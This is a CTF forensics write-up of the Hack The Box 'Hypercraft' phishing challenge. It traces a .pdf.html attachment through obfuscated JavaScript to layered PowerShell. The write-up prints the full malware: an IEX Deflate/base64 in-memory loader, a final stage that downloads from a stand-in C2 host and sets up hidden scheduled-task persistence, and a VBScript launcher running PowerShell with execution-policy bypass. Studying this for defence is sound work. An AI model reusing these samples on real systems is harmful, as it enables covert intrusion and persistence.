← Back to blog

Hypercraft

July 17, 2023 · Hack The Box / Business CTF 2023 forensicsbase64powershelldeflatexorobfuscationvbscript

This email seems to have come from one of our agents, Axel Knight, but Axel has been missing for weeks, and we believe him to be compromised. The email claims to have information that could be vital to our winning this war, but before we use it, we want to make sure it is safe to open. Analyze the given email and see if it’s real, or if it’s just the Arodorians trying to phish us, and find the flag.

Files

Download: forensics_hypercraft.zip

Recon

We are handed a single .eml file. The first step in any phishing analysis is to read the raw message and inspect its headers, body, and attachments. The .eml format is just MIME, so cat shows us the structure directly.

cat hypercraft.eml

Content-Type: multipart/mixed; boundary="===============2174251299668768024=="
MIME-Version: 1.0
Delivered-To: [email protected]
From: [email protected]
To: [email protected]
Subject: Urgent - Plans for Arodorian Hypercraft

--===============2174251299668768024==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

Many Zeniumites died to recover the information provided here. Attached you'll find the schematics for the latest hypercraft spaceship under development by the Commonwealth of Arodor Maximus. These plans are more sophisticated than we expected, and show that we are at extreme risk of losing the race, and ultimately, our freedom. Please get these to our top engineers immediately, of all hope for the Zenium is lost.

I'm uploading this over a low-quality long-distance link. If the cloud copy is corrupted, try the download. You must get these plans to leadership. You're our only hope.

-- Axel
--===============2174251299668768024==
Content-Type: application/octet-stream
MIME-Version: 1.0
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="[TOP SECRET] Arodorian Hypercraft.pdf.html"

...

The message body is social-engineering flavor text, but the interesting part is the attachment: a file named [TOP SECRET] Arodorian Hypercraft.pdf.html. The double extension (.pdf.html) is a classic phishing trick to make an HTML payload look like a harmless PDF.

Unpacking the Attachment

After decoding and saving the base64 attachment, opening it produces a follow-on file, a ZIP archive named [TOP SECRET]Hypercraft Plans.zip. Extracting that archive yields a JavaScript file, which is the next stage of the payload.

Inspecting the JavaScript, we find a very long string assigned to a variable followed by some code below it. Cleaning up the variable (removing the /[sV]/g junk characters used to break up the real content) reveals another JavaScript file embedded inside.

To recover that embedded source cleanly, we pull the sourcesContent field out of the JSON-like structure with jq and pretty-print it with js-beautify.

cat TS-Arodorian3.pdf.js | jq -r '.sourcesContent[]' | js-beautify > TS-Arodorian4.pdf.js

Dynamic Analysis of the JavaScript

Rather than statically untangle the obfuscation, we run the recovered JavaScript in the browser console, but only up to the variable named ynvjonvw, then inspect its value:

console.log(ynvjonvw)

Examining the decoded value, the second element contains a PowerShell command. The classic randomized casing (PoweRShElL -EXEcU byPAss) and the IEx(...) / DeflateStream / FromBase64String chain show this is a base64-encoded, Deflate-compressed PowerShell stage that is decompressed and executed in memory:

PoweRShElL -EXEcU  byPAss    'IEx(NEW-oBJeCT  SYsTeM.iO.COmpResSion.dEfLaTestReAm( [SySTem.IO.meMOrYStReAm] [convert]::FromBase64String(''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''),[SyStEM.IO.COMPreSSION.cOMPRessIONmodE]::DECOMPReSS)| FOrEach{NEW-oBJeCT  iO.sTReAMREaDEr( $_,[SYsTeM.TExt.eNcodiNg]::AsCii ) } ).reaDTOEnd( )'

Decoding the Compressed PowerShell Stage

To see what the next stage actually does, we replicate its own decode logic. The following PowerShell script takes the base64 blob, decodes it, decompresses it with the Deflate algorithm, and prints each line of the result:

$base64data = "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"
$data = [System.Convert]::FromBase64String($base64data)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null

$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))

while ($line = $sr.ReadLine()) {
    $line
}

The same Inflate operation can be performed in CyberChef with this recipe:

https://gchq.github.io/CyberChef/#recipe=Decode_text(‘UTF-16LE%20(1200)’/disabled)From_Decimal(‘Line%20feed’,false)Raw_Inflate(0,0,‘Adaptive’,false,false

Deobfuscating the Final Stage

The decompressed output is yet another heavily obfuscated PowerShell script. It is full of XOR-encoded byte arrays, format-string token shuffling ("{2}{3}{1}{0}" -f ...), and backtick-broken identifiers, all standard PowerShell obfuscation techniques meant to defeat static signatures.

The key routine is UYcxq, which XOR-decodes a byte array against a single key and returns the ASCII string. We decode each variable by running sections of the script one at a time. The flag ends up living in the $aetRsdf variable.

SET-ItEM ("VAr"+"Ia"+"B"+"le:4z0")  ([TypE]("{2}{3}{1}{0}" -f'odinG','.enC','sYSTEm.T','ext')  )  ;   sv  IgF  (  [TypE]("{1}{0}{2}{3}" -f'OnVe','SYsTEM.c','r','T')  )  ;sV ('5EV'+'lS') ([type]("{1}{2}{0}" -F 'E','Io','.fIL'))  ;  &("{4}{1}{3}{0}{2}"-f 'ri','et-','ctMode','St','S') -Version 2
function UYc`xq (${TN`me},${Chk`go`Iul}) {
    for (${eum`lMx`NyUg} = 0; ${eu`mL`MxNYug} -lt ${T`NME}."c`OUnt"; ${Eu`MLMx`NyUG}++) {
       ${T`NME}[${eUM`lM`XnyuG}] = (${t`NmE}[${eUm`Lmx`N`yuG}] -bxor ${c`HKGo`iUl})
    }
    return  ( gEt-vaRIAble ("4"+"Z0")  -VaL)::"As`Cii"."gETs`T`RIng"(${tN`Me})
}
function Rc`DAt`CaJT {return (1..16 | .('%'){ '{0:X}' -f (&("{0}{2}{1}" -f 'Ge','andom','t-R') -Max 16) }) -join ''}
${E`UM`lm`XNy`UGzzOO} = (&("{0}{1}" -f 'UyC','xq') ([System.Byte[]] @(0x0a,0x16,0x16,0x12,0x58,0x4d,0x4d,0x11,0x16,0x0d,0x0e,0x07,0x0c,0x12,0x0e,0x03,0x0c,0x11,0x4c,0x0a,0x16,0x00,0x4d,0x10,0x4d)) 98)
${suQ`QsIgl} = (.("{1}{0}" -f 'Cxq','Uy') ([System.Byte[]] @(0x31,0x3c,0x36)) 80)
${X`s`xnap`VE} = (&("{1}{0}"-f'xq','UyC') ([System.Byte[]] @(0x42,0x13,0x7d,0x4c,0x4c,0x78,0x5d,0x48,0x5d,0x13,0x70,0x53,0x5f,0x5d,0x50,0x13,0x71,0x55,0x5f,0x4e,0x53,0x4f,0x53,0x5a,0x48,0x13,0x6b,0x55,0x52,0x58,0x53,0x4b,0x4f,0x13,0x6c,0x53,0x4b,0x59,0x4e,0x6f,0x54,0x59,0x50,0x50,0x13)) 60)
&('cd') ${XSx`NAp`Ve}
${cyR`YX`whqM} = (.("{1}{2}{0}" -f 't','R','cDATCAJ'))+(.("{0}{1}"-f 'UyC','xq') ([System.Byte[]] @(0x67,0x3f,0x2b,0x3a)) 73)
${N`yNG} = (.("{1}{0}" -f 'd','pw')).("{0}{1}{2}" -f 'ToStr','i','ng').Invoke() + '\' + ${cyRYXw`H`qM}
${WbwM`g`QB} = (.("{2}{1}{0}"-f 'Jt','TCA','RcDA')) + (.("{3}{1}{2}{0}" -f'Jt','AT','CA','RcD'))
${u`JRW} = $(.("{0}{1}" -f 'whoa','mi'))
${EUMLmX`NYuGS`WAb`lOEP} = (.("{1}{0}"-f'yCxq','U') ([System.Byte[]] @(0x5d,0x7d,0x45,0x3d,0x4d,0x42,0x60,0x50,0x5d,0x37,0x4e,0x74,0x67,0x4c,0x55,0x71,0x55,0x5c,0x4e,0x6a,0x60,0x53,0x35,0x68,0x66,0x6a,0x56,0x7e,0x4f,0x40,0x45,0x74,0x47,0x6a,0x4a,0x68,0x60,0x47,0x46,0x7e,0x4d,0x40,0x34,0x63,0x55,0x37,0x4e,0x68,0x5d,0x5c,0x56,0x68,0x50,0x36,0x4e,0x75,0x5e,0x53,0x4a,0x34,0x4f,0x47,0x4e,0x5c,0x51,0x36,0x4a,0x7d,0x65,0x5c,0x46,0x34,0x48,0x68,0x4a,0x6b,0x5e,0x53,0x7c,0x77,0x4d,0x6d,0x6f,0x4f,0x67,0x7d,0x31,0x57,0x60,0x53,0x30,0x63,0x4d,0x6a,0x46,0x72,0x60,0x36,0x52,0x7d,0x67,0x36,0x6c,0x68,0x66,0x43,0x73,0x71,0x5e,0x5c,0x6c,0x68,0x4d,0x47,0x35,0x68,0x61,0x43,0x52,0x6e,0x4d,0x43,0x4e,0x31,0x67,0x43,0x42,0x7e,0x67,0x7d,0x45,0x6d,0x4d,0x47,0x5d,0x63,0x5d,0x7d,0x73,0x73,0x47,0x63,0x39,0x39)) 4);
${r`ERbWtRv} =  $igf::("{1}{3}{0}{2}{4}"-f 'ase64','From','Strin','B','g').Invoke(${eu`ml`MXny`UgsW`ABl`OEp})
  (get-VariAbLe ('5EV'+'LS')  -Va)::("{1}{2}{0}" -f'ytes','wri','teallb').Invoke(${N`ynG},${ReR`Bw`TRV});
${as`kz`pH`UpAj} = (.("{0}{1}"-f'p','wd')).("{0}{1}{2}"-f'ToStr','in','g').Invoke() + '\'
${vQp`SBX`gyj} = (&("{3}{0}{2}{1}" -f 'cD','Jt','ATCA','R'))
${a`etR`sd`f} = (&("{2}{1}{0}" -f 'q', 'cx', 'UY') ([System.Byte[]] @(0x97,0x8b,0x9d,0xa4,0xb3,0xef,0xab,0xac,0x80,0xb0,0xb9,0x80,0xb3,0xeb,0x86,0xec,0xad,0xac,0x80,0xb6,0x91,0x80,0xab,0xb7,0xeb,0xab,0x80,0xee,0xa2)) 223)
${t`kqr`mLSfPD} = '"' + (&("{1}{0}"-f 'xq','UyC') ([System.Byte[]] @(0x22,0x2e,0x33,0x6b,0x63,0x22,0x3c,0x39,0x6b,0x66,0x3e,0x38,0x2e,0x29,0x6b)) 75) + "$eUmLmxNYuGZZoO$suqqSiGL/$vQpsbXGyj)" + '"'
${eRQ`cf} = &("{1}{4}{3}{6}{2}{5}{0}"-f'TaskAction','New-S','le','e','ch','d','du') -Execute "$aSKZpHuPaj$cyrYXWhqM" -Argument ${Tk`Q`Rmls`FpD}
${tpNDJP`w`Aa} = .("{1}{2}{0}{4}{6}{3}{5}"-f'h','New-S','c','edTaskPrin','edu','cipal','l') "$UJrw"
${aIuf`d`yWasr} = .("{4}{1}{5}{2}{0}{3}" -f'igge','w-Sche','askTr','r','Ne','duledT') -Once -At (&("{0}{1}"-f 'Get-D','ate')).AddDays(1) -RepetitionInterval (&("{1}{2}{0}" -f'pan','New-Time','S') -Days 1) -RepetitionDuration (.("{1}{2}{3}{0}"-f'n','New-Ti','meS','pa') -Days(365))
${d`wtTAWqx} = .("{5}{4}{0}{6}{1}{3}{2}" -f 'ledT','skS','ttingsSet','e','w-Schedu','Ne','a') -Hidden -MultipleInstances ("{0}{2}{1}" -f'Par','el','all') -AllowStartIfOnBatteries
.("{2}{1}{3}{4}{6}{0}{5}"-f 'T','egis','R','ter-','Sche','ask','duled') -TaskName ${WbWm`g`Qb} -Action ${Er`qcf} -Trigger ${AI`Uf`dY`WASr} -Settings ${dW`TTAWqx}

This stage establishes persistence: it writes out a payload, then uses Register-ScheduledTask (with a hidden, repeating trigger every day for a year) to keep running it. The XOR-encoded byte arrays decode to strings such as URLs and paths. They can be decoded in CyberChef by reading the 0x-with-comma hex and XORing with the appropriate key (here the first byte array uses key 0x61):

https://gchq.github.io/CyberChef/#recipe=From_Hex(‘0x%20with%20comma’)XOR(%7B’option’:‘Hex’,‘string’:‘61’%7D,‘Standard’,false)

Flag

Decoding the variables reveals the indicators of compromise: the download/C2 host, the persistence directory, and a small VBScript launcher used to run PowerShell silently.

http://stolenplans.htb/r/
alf
~/AppData/Local/Microsoft/Windows/PowerShell/

c = WScript.Arguments(0)
set s = CreateObject("WScript.Shell")
s.Run "powershell.exe -exec bypass " & c,0

The flag is found in the $aetRsdf variable in this final stage (in the last part where it downloads the “stolenplans” payload it is present but hidden):

HTB{l0ts_of_l4Y3rs_iN_th4t_1}